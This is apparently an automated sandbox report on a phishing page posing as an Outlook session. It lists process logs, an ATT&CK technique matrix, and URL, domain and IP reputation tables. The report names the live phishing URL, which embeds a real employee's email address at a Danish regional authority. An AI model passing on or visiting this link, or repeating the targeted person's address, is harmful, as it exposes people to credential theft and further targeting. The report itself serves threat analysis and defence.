          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1928,i,13413356600971011480,18213977548615804884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Drive-by Compromise
          Windows Management Instrumentation2
          Browser Extensions
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Extra Window Memory Injection
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Extra Window Memory Injection
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          No bigger version
          No bigger version
          No bigger version
          No bigger version
          No bigger version

          windows-stand
          SourceDetectionScannerLabelLink
          https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk100%Avira URL Cloudphishing
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.google.com/s2/favicons?domain=rsyd.dk0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/dvfhyfra/ikon_v%C3%A6rdier-og-strategier-01.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/lk3dyg0b/ikon_rettigheder.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/qpxlgn1n/blodproever_ikon.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/oqdbl2ov/regions_logo-1.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/dist/js/behaviors-d57c2eeb.pkg.js0%Avira URL Cloudsafe
          https://app-script.monsido.com/v2/monsido-script.js0%Avira URL Cloudsafe
          https://use.typekit.net/yrt5fsi.css0%Avira URL Cloudsafe
          https://rsyd.dk/0%Avira URL Cloudsafe
          https://www.google.com/s2/favicons?domain=zoho.com0%Avira URL Cloudsafe
          https://p.typekit.net/p.css?s=1&k=yrt5fsi&ht=tk&f=31165&a=32793850&app=typekit&e=css0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/lcgfzarc/blaa-blink_ikon.svg0%Avira URL Cloudsafe
          https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/bootstrap-icons.css0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/f3enu2bz/ikon_milj%C3%B8.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/dist/css/style-34c02e3aa3.css0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/2y4nwgys/telefon_ikon.svg0%Avira URL Cloudsafe
          https://customer.cludo.com/assets/92/12437-3/cludo-search-main.min.css0%Avira URL Cloudsafe
          https://use.typekit.net/af/9098db/00000000000000003b9ae80c/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n5&v=30%Avira URL Cloudsafe
          https://customer.cludo.com/assets/92/12437-3/cludo-search-nyhedsarkiv.min.css0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/llodxjjd/transport-patient_ikon.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/dist/js/5-df5b9302.pkg.js0%Avira URL Cloudsafe
          https://customer.cludo.com/assets/92/11814/css/cludo-sayt.css0%Avira URL Cloudsafe
          https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/favicon.ico100%Avira URL Cloudphishing
          https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-11043354.entry.js0%Avira URL Cloudsafe
          https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-4ded6b1b.js0%Avira URL Cloudsafe
          https://customer.cludo.com/scripts/bundles/search-script.js0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/msfnvbuc/dronebillede-af-byggeriet-af-det-nye-ouh.jpg?width=1&format=webp0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/cqsbfjda/opkaldsrum15.jpg?width=1&format=webp0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/dist/js/18-4c92a603.pkg.js0%Avira URL Cloudsafe
          https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-14adbd1a.js0%Avira URL Cloudsafe
          https://customer.cludo.com/scripts/beta/sayt/0.9.5/sayt.bundle.js0%Avira URL Cloudsafe
          https://api-eu1.cludo.com/api/v3/92/11814/websites/publicsettings?0%Avira URL Cloudsafe
          https://heatmaps.monsido.com/v1/settings/BHmXVQE9FTaR-3RZSVX6Pg.json0%Avira URL Cloudsafe
          https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/cludo-component-library.esm.js0%Avira URL Cloudsafe
          https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-b351486a.entry.js0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/h5fdq5gq/sekretaer_ikon.svg0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/ekuljfvy/vand-og-jord.mp40%Avira URL Cloudsafe
          https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/fonts/bootstrap-icons.woff2?1fa40e8900654d2863d011707b9fb6f20%Avira URL Cloudsafe
          https://heatmaps.monsido.com/v1/heatmaps.js0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/htmltoyi/dobbeltdiagnose.jpg?width=1&format=webp0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/dist/js/7-a2ce62ac.pkg.js0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/media/mk1heo0c/mikkel-hansen.jpg?width=1&format=webp0%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=3c%2FVAbRLcBaTzhLQKrM0NcT8irAyKePURded2J2oBi6p0Er3Njj5VS6rnQYsy%2FQQzoh76nzTf9FfLaOmNiYvMR7sUoMx4XW3COZ93bdhvMgjbmYkeu%2F3mzMFli11OiPliV%2BXFEz7Jy8UHexszcDXj3ba44qpA7zqYJ%2FLfwfXbCHwsy6oGKX7TQKvLF8NIFbxIGA%3D0%Avira URL Cloudsafe
          https://regionsyddanmark.dk/dist/js/13-2bfd4e8e.pkg.js0%Avira URL Cloudsafe
          https://tracking.monsido.com/?a=BHmXVQE9FTaR-3RZSVX6Pg&b=https%3A%2F%2Fregionsyddanmark.dk%2F&c=2101743077714141&d=1280x1024&e=https%3A%2F%2Fnew-session-outlook-com-01262025-veryfing-successfuli.pages.dev%2F&f=4B91743077714142&h=20%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          jsdelivr.map.fastly.net
          199.232.89.229
          truefalse
            high
            beacons3.gvt2.com
            142.251.40.195
            truefalse
              high
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                beacons-handoff.gcp.gvt2.com
                142.250.72.99
                truefalse
                  high
                  cludo-api-706090758.eu-central-1.elb.amazonaws.com
                  35.156.103.95
                  truefalse
                    unknown
                    new-session-outlook-com-01262025-veryfing-successfuli.pages.dev
                    104.21.32.1
                    truetrue
                      unknown
                      beacons2.gvt2.com
                      142.250.192.99
                      truefalse
                        high
                        heatmaps.monsido.com
                        34.98.91.45
                        truefalse
                          high
                          beacons.gvt2.com
                          142.250.115.94
                          truefalse
                            high
                            customer.cludo.com.cdn.cloudflare.net
                            172.67.27.152
                            truefalse
                              unknown
                              app-script.monsido.com
                              34.98.105.146
                              truefalse
                                high
                                a1874.dscg1.akamai.net
                                23.223.209.69
                                truefalse
                                  high
                                  rsyd.dk
                                  193.163.231.69
                                  truefalse
                                    unknown
                                    regionsyddanmark.dk
                                    193.163.231.69
                                    truefalse
                                      high
                                      tracking.monsido.com
                                      35.190.93.146
                                      truefalse
                                        high
                                        www.google.com
                                        142.250.65.228
                                        truefalse
                                          high
                                          api.ipify.org
                                          104.26.13.205
                                          truefalse
                                            high
                                            beacons4.gvt2.com
                                            216.239.32.116
                                            truefalse
                                              high
                                              a1988.dscg1.akamai.net
                                              23.223.209.5
                                              truefalse
                                                high
                                                e110990.dsca.akamaiedge.net
                                                23.48.224.102
                                                truefalse
                                                  high
                                                  customer.cludo.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    api-eu1.cludo.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      use.typekit.net
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        cdn.jsdelivr.net
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          consent.cookiebot.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            beacons.gcp.gvt2.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              p.typekit.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                NameMaliciousAntivirus DetectionReputation
                                                                https://regionsyddanmark.dk/dist/js/5-df5b9302.pkg.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://regionsyddanmark.dk/dist/js/behaviors-d57c2eeb.pkg.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://regionsyddanmark.dk/media/qpxlgn1n/blodproever_ikon.svgfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/favicon.icotrue
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://regionsyddanmark.dk/false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://rsyd.dk/false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://use.typekit.net/yrt5fsi.cssfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-11043354.entry.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.cssfalse
                                                                  high
                                                                  https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-4ded6b1b.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://use.typekit.net/af/9098db/00000000000000003b9ae80c/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n5&v=3false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-14adbd1a.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://regionsyddanmark.dk/media/cqsbfjda/opkaldsrum15.jpg?width=1&format=webpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://regionsyddanmark.dk/media/f3enu2bz/ikon_milj%C3%B8.svgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://regionsyddanmark.dk/media/lcgfzarc/blaa-blink_ikon.svgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.google.com/s2/favicons?domain=zoho.comfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://regionsyddanmark.dk/media/msfnvbuc/dronebillede-af-byggeriet-af-det-nye-ouh.jpg?width=1&format=webpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/bootstrap-icons.cssfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api.ipify.org/?format=jsonfalse
                                                                    high
                                                                    https://regionsyddanmark.dk/dist/css/style-34c02e3aa3.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://customer.cludo.com/assets/92/12437-3/cludo-search-main.min.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://customer.cludo.com/scripts/bundles/search-script.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://customer.cludo.com/assets/92/11814/css/cludo-sayt.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://regionsyddanmark.dk/media/llodxjjd/transport-patient_ikon.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://regionsyddanmark.dk/dist/js/18-4c92a603.pkg.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://api-eu1.cludo.com/api/v3/92/11814/websites/publicsettings?false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://app-script.monsido.com/v2/monsido-script.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    high
                                                                    https://regionsyddanmark.dk/media/oqdbl2ov/regions_logo-1.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://heatmaps.monsido.com/v1/heatmaps.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://heatmaps.monsido.com/v1/settings/BHmXVQE9FTaR-3RZSVX6Pg.jsonfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/cludo-component-library.esm.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://customer.cludo.com/scripts/beta/sayt/0.9.5/sayt.bundle.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://regionsyddanmark.dk/media/dvfhyfra/ikon_v%C3%A6rdier-og-strategier-01.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://regionsyddanmark.dk/media/lk3dyg0b/ikon_rettigheder.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.google.com/s2/favicons?domain=rsyd.dkfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/fonts/bootstrap-icons.woff2?1fa40e8900654d2863d011707b9fb6f2false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://regionsyddanmark.dk/media/ekuljfvy/vand-og-jord.mp4false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dktrue
                                                                      unknown
                                                                      https://customer.cludo.com/scripts/beta/sayt/0.9.5/component-lib/cludo-component-library/p-b351486a.entry.jsfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://regionsyddanmark.dk/media/h5fdq5gq/sekretaer_ikon.svgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.jsfalse
                                                                        high
                                                                        https://p.typekit.net/p.css?s=1&k=yrt5fsi&ht=tk&f=31165&a=32793850&app=typekit&e=cssfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://regionsyddanmark.dk/media/htmltoyi/dobbeltdiagnose.jpg?width=1&format=webpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://regionsyddanmark.dk/media/2y4nwgys/telefon_ikon.svgfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://regionsyddanmark.dk/dist/js/13-2bfd4e8e.pkg.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://consent.cookiebot.com/uc.jsfalse
                                                                          high
                                                                          https://customer.cludo.com/assets/92/12437-3/cludo-search-nyhedsarkiv.min.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://regionsyddanmark.dk/dist/js/7-a2ce62ac.pkg.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://regionsyddanmark.dk/media/mk1heo0c/mikkel-hansen.jpg?width=1&format=webpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://tracking.monsido.com/?a=BHmXVQE9FTaR-3RZSVX6Pg&b=https%3A%2F%2Fregionsyddanmark.dk%2F&c=2101743077714141&d=1280x1024&e=https%3A%2F%2Fnew-session-outlook-com-01262025-veryfing-successfuli.pages.dev%2F&f=4B91743077714142&h=2false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://a.nel.cloudflare.com/report/v4?s=3c%2FVAbRLcBaTzhLQKrM0NcT8irAyKePURded2J2oBi6p0Er3Njj5VS6rnQYsy%2FQQzoh76nzTf9FfLaOmNiYvMR7sUoMx4XW3COZ93bdhvMgjbmYkeu%2F3mzMFli11OiPliV%2BXFEz7Jy8UHexszcDXj3ba44qpA7zqYJ%2FLfwfXbCHwsy6oGKX7TQKvLF8NIFbxIGA%3Dfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.251.40.227
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          34.98.91.45
                                                                          heatmaps.monsido.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          172.253.122.84
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.81.238
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          34.98.105.146
                                                                          app-script.monsido.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          35.156.103.95
                                                                          cludo-api-706090758.eu-central-1.elb.amazonaws.comUnited States
                                                                          16509AMAZON-02USfalse
                                                                          35.190.93.146
                                                                          tracking.monsido.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.72.100
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          23.223.209.5
                                                                          a1988.dscg1.akamai.netUnited States
                                                                          16625AKAMAI-ASUSfalse
                                                                          35.158.47.86
                                                                          unknownUnited States
                                                                          16509AMAZON-02USfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.26.13.205
                                                                          api.ipify.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          142.250.72.106
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          1.1.1.1
                                                                          unknownAustralia
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.21.32.1
                                                                          new-session-outlook-com-01262025-veryfing-successfuli.pages.devUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          142.250.65.195
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          199.232.89.229
                                                                          jsdelivr.map.fastly.netUnited States
                                                                          54113FASTLYUSfalse
                                                                          193.163.231.69
                                                                          rsyd.dkDenmark
                                                                          44328REGION-SYDDANMARKDKfalse
                                                                          172.67.27.152
                                                                          customer.cludo.com.cdn.cloudflare.netUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          23.223.209.69
                                                                          a1874.dscg1.akamai.netUnited States
                                                                          16625AKAMAI-ASUSfalse
                                                                          142.251.40.234
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.80.10
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.65.228
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          23.48.224.102
                                                                          e110990.dsca.akamaiedge.netUnited States
                                                                          20940AKAMAI-ASN1EUfalse
                                                                          142.250.176.195
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          172.67.74.152
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          IP
                                                                          192.168.2.16
                                                                          192.168.2.15
                                                                          192.168.2.14
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1650103
                                                                          Start date and time:2025-03-27 13:14:34 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                          Sample URL:https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:16
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          Analysis Mode:stream
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal88.phis.win@26/0@77/306
                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 172.253.122.84, 142.250.81.238, 142.250.176.195, 142.250.176.206, 142.250.72.106, 142.250.72.100, 142.251.40.227, 142.251.40.234, 142.250.81.234, 142.251.32.106, 142.251.35.170, 142.251.40.106, 142.251.40.138, 142.251.40.170, 142.250.64.74, 142.250.64.106, 142.250.80.10, 142.250.80.42, 142.250.80.74, 142.250.80.106, 142.250.176.202, 142.251.40.202
                                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com, t0.gstatic.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dk
                                                                          No created / dropped files found
                                                                          No static file info